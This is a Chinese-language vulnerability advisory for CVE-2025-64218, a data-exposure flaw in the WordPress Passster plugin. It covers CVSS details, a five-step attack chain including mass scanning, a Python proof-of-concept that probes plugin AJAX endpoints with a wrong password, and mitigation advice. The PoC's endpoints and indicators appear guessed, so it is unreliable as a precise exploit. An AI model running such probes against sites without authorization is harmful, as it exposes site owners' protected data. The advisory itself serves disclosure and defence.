CVE-2025-64218 WordPress Passster插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-64218

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Chill Passster content-protector (WordPress Passster插件)

漏洞概述

CVE-2025-64218是WordPress Passster内容保护插件中的一个高危敏感信息泄露漏洞。该插件是一款广受欢迎的WordPress内容保护工具，用于对页面、帖子或部分内容进行密码保护。然而在4.2.19及之前版本中，由于程序在处理受保护内容时存在设计缺陷，攻击者可以在无需任何认证的情况下，通过构造特定的请求参数，绕过内容保护机制，检索到原本应该受密码保护的敏感数据。漏洞的CVSS评分为7.5，属于高危级别，主要影响机密性，CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N。此漏洞由Patchstack安全团队发现并上报，攻击者可利用此漏洞获取网站受保护的用户数据、商业机密或其他敏感信息，对网站运营者和用户造成严重安全威胁。

技术细节

该漏洞属于CWE-200类型，即敏感信息暴露给未经授权的参与者。Passster插件在实现内容保护功能时，采用了一种不安全的实现方式。当用户请求受保护的内容时，插件前端会发送AJAX请求到服务器端点进行验证。问题在于服务器端点在处理验证请求时，未能正确实施访问控制检查，导致即使密码验证失败，部分受保护的敏感数据仍然被包含在响应中返回给客户端。攻击者可以通过分析响应内容或利用时间差攻击等侧信道方式，逐步推断出受保护内容。更严重的是，在某些配置下，插件可能直接返回受保护内容的摘要或片段，使得攻击者无需完全解密即可获取关键信息。攻击者利用此漏洞可以构造自动化脚本，大规模扫描目标WordPress站点，批量获取受保护内容的访问权限。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress站点，识别是否安装并启用Passster插件

STEP 2

步骤2

信息收集：攻击者收集受Passster保护的页面ID和内容结构

STEP 3

步骤3

漏洞探测：向插件AJAX端点发送请求，检查响应中是否泄露敏感数据片段

STEP 4

步骤4

数据提取：利用响应中的信息泄露，逐步获取受保护内容或绕过密码验证机制

STEP 5

步骤5

持久化访问：自动化脚本批量扫描，收集所有受保护页面的敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64218 PoC - WordPress Passster Sensitive Data Exposure
# Affected Version: Passster <= 4.2.19

import requests
import sys
from urllib.parse import urljoin

def exploit_passster(target_url, post_id=None):
    """
    Exploit for CVE-2025-64218 - Passster Sensitive Data Exposure
    Tests for exposed sensitive data in password-protected content
    """
    
    target = target_url.rstrip('/')
    
    # Common AJAX endpoints for Passster plugin
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/passster/v1/verify',
        '/?rest_route=/passster/v1/verify'
    ]
    
    # Test data for exploitation
    test_payloads = {
        'action': 'passster_verify_password',
        'post_id': post_id or '1',
        'password': 'wrong_password'
    }
    
    print(f"[*] Target: {target}")
    print(f"[*] Testing Passster plugin for CVE-2025-64218")
    
    for endpoint in endpoints:
        url = urljoin(target, endpoint)
        try:
            # Send request with incorrect password
            response = requests.post(url, data=test_payloads, timeout=10)
            
            # Check for sensitive data exposure indicators
            if response.status_code == 200:
                content = response.text.lower()
                
                # Indicators of data exposure
                exposure_indicators = [
                    'protected_content',
                    'sensitive_data',
                    'hidden_content',
                    'password_protected',
                    'content_excerpt',
                    'preview'
                ]
                
                for indicator in exposure_indicators:
                    if indicator in content:
                        print(f"[!] VULNERABLE! Endpoint: {endpoint}")
                        print(f"[!] Exposure indicator found: {indicator}")
                        print(f"[+] Response preview: {response.text[:500]}")
                        return True
                        
            print(f"[-] Endpoint {endpoint}: Not vulnerable or no response")
            
        except requests.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
    
    print("[*] No obvious vulnerability detected")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-64218.py <target_url> [post_id]")
        sys.exit(1)
    
    target = sys.argv[1]
    post_id = sys.argv[2] if len(sys.argv) > 2 else None
    
    exploit_passster(target, post_id)

影响范围

Passster <= 4.2.19

防御指南

临时缓解措施

作为临时缓解措施，应立即将Passster插件升级到开发者发布的安全版本。如果暂时无法升级，可考虑暂时禁用该插件，并使用WordPress内置的密码保护功能替代。同时建议启用Web应用防火墙规则，监控和阻止针对wp-admin/admin-ajax.php端点的异常请求模式，限制IP访问频率，防止攻击者进行大规模扫描。